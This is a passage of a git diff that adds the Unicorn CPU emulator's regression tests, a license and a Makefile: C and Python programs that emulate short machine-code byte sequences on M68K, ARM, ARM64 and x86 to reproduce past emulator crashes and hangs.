+ printf("uc_emu_start(…)\n"); + uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); + printf("done\n"); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/002-qemu__fatal__unimplemented_control_register_write_0xffb___0x0.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/002-qemu__fatal__unimplemented_control_register_write_0xffb___0x0.c new file mode 100644 index 0000000..6f8575b --- /dev/null +++ 
b/ai_anti_malware/unicorn/unicorn-master/tests/regress/002-qemu__fatal__unimplemented_control_register_write_0xffb___0x0.c @@ -0,0 +1,31 @@ +#include + +#define HARDWARE_ARCHITECTURE UC_ARCH_M68K +#define HARDWARE_MODE 1073741824 +#define MEMORY_STARTING_ADDRESS 8388608 +#define MEMORY_SIZE 2097152 +#define MEMORY_PERMISSIONS 7 +#define BINARY_CODE "\xaf\x80\x4e\x7b\xff\xfb\x80\x4e\x3e\x80" + +static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { + printf("hook_code(…) called\n"); +} + +int main(int argc, char **argv, char **envp) { + uc_engine *uc; + if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { + printf("uc_open(…) failed\n"); + return 1; + } + uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); + if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { + printf("uc_mem_write(…) failed\n"); + return 1; + } + uc_hook trace; + uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, (uint64_t)MEMORY_STARTING_ADDRESS, (uint64_t)(MEMORY_STARTING_ADDRESS + 1)); + printf("uc_emu_start(…)\n"); + uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); + printf("done\n"); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/003-qemu__fatal__wdebug_not_implemented.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/003-qemu__fatal__wdebug_not_implemented.c new file mode 100644 index 0000000..4e07235 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/003-qemu__fatal__wdebug_not_implemented.c @@ -0,0 +1,31 @@ +#include + +#define HARDWARE_ARCHITECTURE UC_ARCH_M68K +#define HARDWARE_MODE 1073741824 +#define MEMORY_STARTING_ADDRESS 1048576 +#define MEMORY_SIZE 403456 +#define MEMORY_PERMISSIONS 7 +#define BINARY_CODE "\x42\xc7\xfb\xfb\x54\x36" + +static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { + printf("hook_code(…) called\n"); +} + +int 
main(int argc, char **argv, char **envp) { + uc_engine *uc; + if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { + printf("uc_open(…) failed\n"); + return 1; + } + uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); + if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { + printf("uc_mem_write(…) failed\n"); + return 1; + } + uc_hook trace; + uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, (uint64_t)MEMORY_STARTING_ADDRESS, (uint64_t)(MEMORY_STARTING_ADDRESS + 1)); + printf("uc_emu_start(…)\n"); + uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); + printf("done\n"); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/004-segmentation_fault_1.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/004-segmentation_fault_1.c new file mode 100644 index 0000000..636cae7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/004-segmentation_fault_1.c @@ -0,0 +1,31 @@ +#include + +#define HARDWARE_ARCHITECTURE UC_ARCH_ARM +#define HARDWARE_MODE 16 +#define MEMORY_STARTING_ADDRESS 1024 +#define MEMORY_SIZE 1796096 +#define MEMORY_PERMISSIONS 7 +#define BINARY_CODE "\x20\xbf\xbf\xbf\xbf\xdd\x5d\x74\x5e\x66\x72\x10" + +static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { + printf("hook_code(…) called\n"); +} + +int main(int argc, char **argv, char **envp) { + uc_engine *uc; + if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { + printf("uc_open(…) failed\n"); + return 1; + } + uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); + if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { + printf("uc_mem_write(…) failed\n"); + return 1; + } + uc_hook trace; + uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, (uint64_t)MEMORY_STARTING_ADDRESS, (uint64_t)(MEMORY_STARTING_ADDRESS + 1)); + printf("uc_emu_start(…)\n"); 
+ uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); + printf("done\n"); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/005-qemu__fatal__illegal_instruction__0000___00000404.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/005-qemu__fatal__illegal_instruction__0000___00000404.c new file mode 100644 index 0000000..b2bea73 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/005-qemu__fatal__illegal_instruction__0000___00000404.c @@ -0,0 +1,31 @@ +#include + +#define HARDWARE_ARCHITECTURE UC_ARCH_M68K +#define HARDWARE_MODE 1073741824 +#define MEMORY_STARTING_ADDRESS 1024 +#define MEMORY_SIZE 1044480 +#define MEMORY_PERMISSIONS 5 +#define BINARY_CODE "\x4c\x4c" + +static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { + printf("hook_code(…) called\n"); +} + +int main(int argc, char **argv, char **envp) { + uc_engine *uc; + if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { + printf("uc_open(…) failed\n"); + return 1; + } + uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); + if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { + printf("uc_mem_write(…) failed\n"); + return 1; + } + uc_hook trace; + uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, (uint64_t)MEMORY_STARTING_ADDRESS, (uint64_t)(MEMORY_STARTING_ADDRESS + 1)); + printf("uc_emu_start(…)\n"); + uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); + printf("done\n"); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/006-qemu__fatal__illegal_instruction__0421___00040026.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/006-qemu__fatal__illegal_instruction__0421___00040026.c new file mode 100644 index 0000000..607c9d5 --- /dev/null +++ 
b/ai_anti_malware/unicorn/unicorn-master/tests/regress/006-qemu__fatal__illegal_instruction__0421___00040026.c @@ -0,0 +1,31 @@ +#include + +#define HARDWARE_ARCHITECTURE UC_ARCH_M68K +#define HARDWARE_MODE 1073741824 +#define MEMORY_STARTING_ADDRESS 262144 +#define MEMORY_SIZE 403456 +#define MEMORY_PERMISSIONS 7 +#define BINARY_CODE "\xe2\x86\x09\xbc\xf2\x17\x09\xca\xca\xca\xca\x09\x09\x09\xf2\x17\x09\x20\x09\x09\xf2\x08\x09\x03\x09\xca\x6b\x6b\x6b\x1e\xca\xca\x86\x09\x09\xf2\x17\x09\x04\x21\x09\x09\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf2" + +static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { + printf("hook_code(…) called\n"); +} + +int main(int argc, char **argv, char **envp) { + uc_engine *uc; + if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { + printf("uc_open(…) failed\n"); + return 1; + } + uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); + if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { + printf("uc_mem_write(…) failed\n"); + return 1; + } + uc_hook trace; + uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, (uint64_t)MEMORY_STARTING_ADDRESS, (uint64_t)(MEMORY_STARTING_ADDRESS + 1)); + printf("uc_emu_start(…)\n"); + uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); + printf("done\n"); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/00opcode_uc_crash.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/00opcode_uc_crash.c new file mode 100644 index 0000000..e735cfe --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/00opcode_uc_crash.c @@ -0,0 +1,69 @@ +#include +#include +#include + +#include + +#define X86_CODE32 "\x00" // add byte ptr ds:[eax],al +#define ADDRESS 0x1000000 + +static void VM_exec() +{ + uc_engine *uc; + uc_err err; + uint32_t tmp; + unsigned int r_eax; + + r_eax = 0x1000008; + 
+ // Initialize emulator in X86-32bit mode + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if(err) + { + printf("Failed on uc_open() with error returned: %s\n", uc_strerror(err)); + return; + } + + err = uc_mem_map(uc, ADDRESS, (4 * 1024 * 1024), UC_PROT_ALL); + if(err != UC_ERR_OK) + { + printf("Failed to map memory %s\n", uc_strerror(err)); + return; + } + + // write machine code to be emulated to memory + err = uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1); + if(err != UC_ERR_OK) + { + printf("Failed to write emulation code to memory, quit!: %s(len %zu)\n", uc_strerror(err), sizeof(X86_CODE32) - 1); + return; + } + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); + + // emulate machine code in infinite time + err = uc_emu_start(uc, ADDRESS, ADDRESS + (sizeof(X86_CODE32) - 1), 0, 0); + if(err) + { + printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + + uc_close(uc); + return; + } + + if (!uc_mem_read(uc, ADDRESS+8, &tmp, sizeof(tmp))) + printf(">>> Read 4 bytes from [0x%08X] = 0x%08X\n", ADDRESS+8, tmp); //should contain the byte '8' + else + printf(">>> Failed to read 4 bytes from [0x%08X]\n", ADDRESS+8); + + uc_close(uc); + + puts("No crash. Yay!"); +} + +int main(int argc, char *argv[]) +{ + VM_exec(); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/LICENSE b/ai_anti_malware/unicorn/unicorn-master/tests/regress/LICENSE new file mode 100644 index 0000000..dd85900 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/LICENSE @@ -0,0 +1,30 @@ +This is the software license for Unicorn regression tests. The regression tests +are written by several Unicorn contributors (See CREDITS.TXT) and maintained by +Hoang-Vu Dang + +Copyright (c) 2015, Unicorn contributors +All rights reserved. 
+ +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +* Redistributions of source code must retain the above copyright notice, + this list of conditions and the following disclaimer. +* Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. +* Neither the name of the developer(s) nor the names of its + contributors may be used to endorse or promote products derived from this + software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE +LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE +POSSIBILITY OF SUCH DAMAGE. 
diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/Makefile b/ai_anti_malware/unicorn/unicorn-master/tests/regress/Makefile new file mode 100644 index 0000000..49f0dfe --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/Makefile @@ -0,0 +1,23 @@ +CFLAGS += -Wall -Werror -I../../include +CFLAGS += -D__USE_MINGW_ANSI_STDIO=1 +LDLIBS += -L../../ -lm -lunicorn + +UNAME_S := $(shell uname -s) +LDLIBS += -pthread +ifeq ($(UNAME_S), Linux) +LDLIBS += -lrt +endif + +EXECUTE_VARS = LD_LIBRARY_PATH=../../cmocka/src:../../ DYLD_LIBRARY_PATH=../../ + +TESTS_SOURCE = $(wildcard *.c) +TESTS = $(TESTS_SOURCE:%.c=%) + +.PHONY: all clean test + +test: $(TESTS) + +all: $(TESTS) + +clean: + rm -f $(TESTS) diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm64_reg_rw_w0_w30.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm64_reg_rw_w0_w30.py new file mode 100644 index 0000000..fc34ea4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm64_reg_rw_w0_w30.py @@ -0,0 +1,30 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.arm64_const import * +from unicorn.x86_const import * + +import regress + +class Arm64RegReadWriteW0ThroughW30(regress.RegressTest): + """ + Testing the functionality to read/write 32-bit registers in AArch64 + See issue #716 + """ + + def runTest(self): + uc = Uc(UC_ARCH_ARM64, UC_MODE_ARM) + + uc.reg_write(UC_ARM64_REG_X0, 0x1234567890abcdef) + self.assertEquals(uc.reg_read(UC_ARM64_REG_X0), 0x1234567890abcdef) + self.assertEquals(uc.reg_read(UC_ARM64_REG_W0), 0x90abcdef) + + uc.reg_write(UC_ARM64_REG_X30, 0xa1b2c3d4e5f6a7b8) + self.assertEquals(uc.reg_read(UC_ARM64_REG_W30), 0xe5f6a7b8) + + uc.reg_write(UC_ARM64_REG_W30, 0xaabbccdd) + self.assertEquals(uc.reg_read(UC_ARM64_REG_X30), 0xa1b2c3d4aabbccdd) + self.assertEquals(uc.reg_read(UC_ARM64_REG_W30), 0xaabbccdd) + +if __name__ == '__main__': + regress.main() diff --git 
a/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_apsr_access.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_apsr_access.py new file mode 100644 index 0000000..33c10fd --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_apsr_access.py @@ -0,0 +1,30 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.arm_const import * + +import regress + +class APSRAccess(regress.RegressTest): + + def runTest(self): + code = ( + b'\x00\x00\xa0\xe1' + # 0: mov r0, r0 + b'\x08\x10\x9f\xe5' + # 4: ldr r1, [pc, #8] + b'\x01\xf0\x28\xe1' + # 8: 01 f0 28 e1 msr apsr_nzcvq, r1 + b'\x00\x00\xa0\xe1' + # c: mov r0, r0 + b'\x00\x00\xa0\xe1' + # 10: mov r0, r0 + b'\x00\x00\x00\xff') # 14: data for inst @4 + + uc = Uc(UC_ARCH_ARM, UC_MODE_ARM) + uc.mem_map(0x1000, 0x1000) + uc.mem_write(0x1000, code) # bxeq lr; mov r0, r0 + + uc.reg_write(UC_ARM_REG_APSR, 0) + uc.emu_start(0x1000, 0x100c) + + self.assertEqual(uc.reg_read(UC_ARM_REG_APSR), 0xf8000000) + self.assertEqual(uc.reg_read(UC_ARM_REG_APSR_NZCV), 0xf0000000) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_bx_unmapped.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_bx_unmapped.py new file mode 100644 index 0000000..e18d345 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_bx_unmapped.py @@ -0,0 +1,93 @@ +from __future__ import print_function +from unicorn import * +from unicorn.arm_const import * +import regress + +# code to be emulated +''' +ins = { + 0x00008cd4: """ + push {r11} + add r11, sp, #0 + mov r3, pc + mov r0, r3 + sub sp, r11, #0 + pop {r11} + bx lr + """, + 0x00008cf0: """ + push {r11} + add r11, sp, #0 + push {r6} + add r6, pc, $1 + bx r6 + .code 16 + mov r3, pc + add r3, $0x4 + push {r3} + pop {pc} + .code 32 + pop {r6} + mov r0, r3 + sub sp, r11, #0 + pop {r11} + bx lr + """, + 0x00008d20: """ + push {r11} + add r11, sp, #0 + mov r3, lr + mov r0, r3 + sub 
sp, r11, #0 + pop {r11} + bx lr + """, + 0x00008d68: "bl 0x8cd4\n" + "mov r4, r0\n" + "bl 0x8cf0\n" + "mov r3, r0\n" + "add r4, r4, r3\n" + "bl 0x8d20\n" + "mov r3, r0\n" + "add r2, r4, r3", +} +''' + +class BxTwiceTest(regress.RegressTest): + def runTest(self): + ADDRESS = 0x8000 + MAIN_ADDRESS = 0x8d68 + STACK_ADDR = ADDRESS + 0x1000 + + code = { + 0x8cf0: '\x04\xb0-\xe5\x00\xb0\x8d\xe2\x04`-\xe5\x01`\x8f\xe2\x16\xff/\xe1{F\x03\xf1\x04\x03\x08\xb4\x00\xbd\x00\x00\x04`\x9d\xe4\x03\x00\xa0\xe1\x00\xd0K\xe2\x04\xb0\x9d\xe4\x1e\xff/\xe1', + 0x8d20: '\x04\xb0-\xe5\x00\xb0\x8d\xe2\x0e0\xa0\xe1\x03\x00\xa0\xe1\x00\xd0K\xe2\x04\xb0\x9d\xe4\x1e\xff/\xe1', + 0x8cd4: '\x04\xb0-\xe5\x00\xb0\x8d\xe2\x0f0\xa0\xe1\x03\x00\xa0\xe1\x00\xd0K\xe2\x04\xb0\x9d\xe4\x1e\xff/\xe1', + 0x8d68: '\xd9\xff\xff\xeb\x00@\xa0\xe1\xde\xff\xff\xeb\x000\xa0\xe1\x03@\x84\xe0\xe7\xff\xff\xeb\x000\xa0\xe1\x03 \x84\xe0' + } + + try: + mu = Uc(UC_ARCH_ARM, UC_MODE_ARM) + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + for addr, c in code.items(): + print("Writing chunk to 0x{:x}".format(addr)) + mu.mem_write(addr, c) + + # initialize machine registers + mu.reg_write(UC_ARM_REG_SP, STACK_ADDR) + + print("Starting emulation") + + # emulate code in infinite time & unlimited instructions + mu.emu_start(MAIN_ADDRESS, MAIN_ADDRESS + len(code[MAIN_ADDRESS])) + + print("Emulation done") + + r2 = mu.reg_read(UC_ARM_REG_R2) + print(">>> r2: 0x{:08x}".format(r2)) + + except UcError as e: + self.fail("ERROR: %s" % e) diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_bxeq_hang.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_bxeq_hang.py new file mode 100644 index 0000000..5040d72 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_bxeq_hang.py @@ -0,0 +1,28 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.arm_const import * + +import regress + +class 
BxHang(regress.RegressTest): + + def runTest(self): + uc = Uc(UC_ARCH_ARM, UC_MODE_ARM) + uc.mem_map(0x1000, 0x1000) + uc.mem_write(0x1000, '1eff2f010000a0e1'.decode('hex')) # bxeq lr; mov r0, r0 + uc.count = 0 + + def hook_block(uc, addr, *args): + print 'enter block 0x%04x' % addr + uc.count += 1 + + uc.reg_write(UC_ARM_REG_LR, 0x1004) + uc.hook_add(UC_HOOK_BLOCK, hook_block) + print 'block should only run once' + uc.emu_start(0x1000, 0x1004) + + self.assertEqual(uc.count, 1) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_enable_vfp.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_enable_vfp.c new file mode 100644 index 0000000..aebcd98 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_enable_vfp.c @@ -0,0 +1,65 @@ +#include +#include +#include +#include + +#define ADDRESS 0x1000 +#define ARM_VMOV "\xC0\xEF\x10\x00" // VMOV.I32 D16, #0 ; Vector Move + +int main() +{ + uc_engine *uc; + uc_err err; + + err = uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc); + if (err) { + printf("uc_open %d\n", err); + return 1; + } + + uint64_t tmp_val; + + err = uc_reg_read(uc, UC_ARM_REG_C1_C0_2, &tmp_val); + if (err) { + printf("uc_open %d\n", err); + return 1; + } + + tmp_val = tmp_val | (0xf << 20); + err = uc_reg_write(uc, UC_ARM_REG_C1_C0_2, &tmp_val); + if (err) { + printf("uc_open %d\n", err); + return 1; + } + + size_t enable_vfp = 0x40000000; + err = uc_reg_write(uc, UC_ARM_REG_FPEXC, &enable_vfp); + if (err) { + printf("uc_open %d\n", err); + return 1; + } + + err = uc_mem_map(uc, ADDRESS, 4 * 1024, UC_PROT_ALL); + if (err) { + printf("uc_mem_map %d\n", err); + return 1; + } + + err = uc_mem_write(uc, ADDRESS, ARM_VMOV, sizeof(ARM_VMOV) - 1); + if (err) { + printf("uc_mem_map %s\n", uc_strerror(err)); + return 1; + } + + err = uc_emu_start(uc, ADDRESS, 0, 0, 1); + if (err) { + printf("uc_emu_start: %s\n", uc_strerror(err)); + return 1; + } + + printf("Success\n"); + + 
uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_fp_vfp_disabled.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_fp_vfp_disabled.py new file mode 100644 index 0000000..b8003a3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_fp_vfp_disabled.py @@ -0,0 +1,44 @@ +#!/usr/bin/python +# coding=utf8 + +# Added by Peter Mackay, relating to issue 571 +# "ARM NEON/VFP support seems to exist but is disabled by default" +# https://github.com/unicorn-engine/unicorn/issues/571 + +from unicorn import * +from unicorn.arm_const import * + +import regress + +class FpVfpDisabled(regress.RegressTest): + + def runTest(self): + # MRC p15, #0, r1, c1, c0, #2 + # ORR r1, r1, #(0xf << 20) + # MCR p15, #0, r1, c1, c0, #2 + # MOV r1, #0 + # MCR p15, #0, r1, c7, c5, #4 + # MOV r0,#0x40000000 + # FMXR FPEXC, r0 + code = '11EE501F' + code += '41F47001' + code += '01EE501F' + code += '4FF00001' + code += '07EE951F' + code += '4FF08040' + code += 'E8EE100A' + # vpush {d8} + code += '2ded028b' + + address = 0x1000 + mem_size = 0x1000 + code_bytes = code.decode('hex') + + uc = Uc(UC_ARCH_ARM, UC_MODE_THUMB) + uc.mem_map(address, mem_size) + uc.mem_write(address, code_bytes) + uc.reg_write(UC_ARM_REG_SP, address + mem_size) + uc.emu_start(address + 1, address + len(code_bytes)) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_init_input_crash.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_init_input_crash.py new file mode 100644 index 0000000..ecafbfd --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_init_input_crash.py @@ -0,0 +1,109 @@ +#!/usr/bin/env python +# Sample code for ARM of Unicorn. 
Nguyen Anh Quynh +# Python sample ported by Loi Anh Tuan +# + + +from __future__ import print_function +from unicorn import * +from unicorn.arm_const import * + + +# code to be emulated +ARM_CODE = "\x37\x00\xa0\xe3\x03\x10\x42\xe0" # mov r0, #0x37; sub r1, r2, r3 +THUMB_CODE = "\x83\xb0" # sub sp, #0xc +# memory address where emulation starts +ADDRESS = 0xF0000000 + + +# callback for tracing basic blocks +def hook_block(uc, address, size, user_data): + print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) + + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = %u" %(address, size)) + + +# Test ARM +def test_arm(): + print("Emulate ARM code") + try: + # Initialize emulator in ARM mode + mu = Uc(UC_ARCH_ARM, UC_MODE_ARM) + + mem_size = 2 * (1024 * 1024) + mu.mem_map(ADDRESS, mem_size) + + stack_address = ADDRESS + mem_size + stack_size = stack_address # >>> here huge memory size + mu.mem_map(stack_address, stack_size) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, ARM_CODE) + + # initialize machine registers + mu.reg_write(UC_ARM_REG_R0, 0x1234) + mu.reg_write(UC_ARM_REG_R2, 0x6789) + mu.reg_write(UC_ARM_REG_R3, 0x3333) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(ARM_CODE)) + + # now print out some registers + print(">>> Emulation done. 
Below is the CPU context") + + r0 = mu.reg_read(UC_ARM_REG_R0) + r1 = mu.reg_read(UC_ARM_REG_R1) + print(">>> R0 = 0x%x" %r0) + print(">>> R1 = 0x%x" %r1) + + except UcError as e: + print("ERROR: %s" % e) + + +def test_thumb(): + print("Emulate THUMB code") + try: + # Initialize emulator in thumb mode + mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, THUMB_CODE) + + # initialize machine registers + mu.reg_write(UC_ARM_REG_SP, 0x1234) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(THUMB_CODE)) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + sp = mu.reg_read(UC_ARM_REG_SP) + print(">>> SP = 0x%x" %sp) + + except UcError as e: + print("ERROR: %s" % e) + + +if __name__ == '__main__': + test_arm() + print("=" * 20) + test_thumb() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_movr12_hang.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_movr12_hang.py new file mode 100644 index 0000000..1bb276e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_movr12_hang.py @@ -0,0 +1,32 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.arm_const import * + +import regress + +class MovHang(regress.RegressTest): + + def runTest(self): + uc = Uc(UC_ARCH_ARM, UC_MODE_ARM) + uc.mem_map(0x1000, 0x1000) + uc.mem_write(0x1000, '00c000e3'.decode('hex')) # movw r12, #0 + + def hook_block(uc, addr, *args): + print 'enter block 0x%04x' % addr + uc.count += 1 + + uc.reg_write(UC_ARM_REG_R12, 0x123) + self.assertEquals(uc.reg_read(UC_ARM_REG_R12), 0x123) + + uc.hook_add(UC_HOOK_BLOCK, hook_block) + uc.count = 0 + + 
#print 'block should only run once' + uc.emu_start(0x1000, 0x1004, timeout=500) + + self.assertEquals(uc.reg_read(UC_ARM_REG_R12), 0x0) + self.assertEquals(uc.count, 1) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_vldr_invalid.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_vldr_invalid.py new file mode 100644 index 0000000..febf93e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_vldr_invalid.py @@ -0,0 +1,18 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.arm_const import * + +import regress + +class VldrPcInsn(regress.RegressTest): + + def runTest(self): + uc = Uc(UC_ARCH_ARM, UC_MODE_ARM) + uc.mem_map(0x1000, 0x1000) + uc.mem_write(0x1000, 'ed9f8a3d'.decode('hex')) # vldr s16, [pc, #244] + # this will raise invalid insn + uc.emu_start(0x1000, 0x1004) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/bad_ram.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/bad_ram.py new file mode 100644 index 0000000..a74fa49 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/bad_ram.py @@ -0,0 +1,30 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.x86_const import * + +import regress + + +class Hang(regress.RegressTest): + + def runTest(self): + PAGE_SIZE = 0x5000 + CODE_ADDR = 0x400000 + RSP_ADDR = 0x200000 + binary1 = "\xCA\x24\x5D" # retf 0x5d24 + mu = Uc(UC_ARCH_X86, UC_MODE_64) + + mu.mem_map(CODE_ADDR, PAGE_SIZE) + 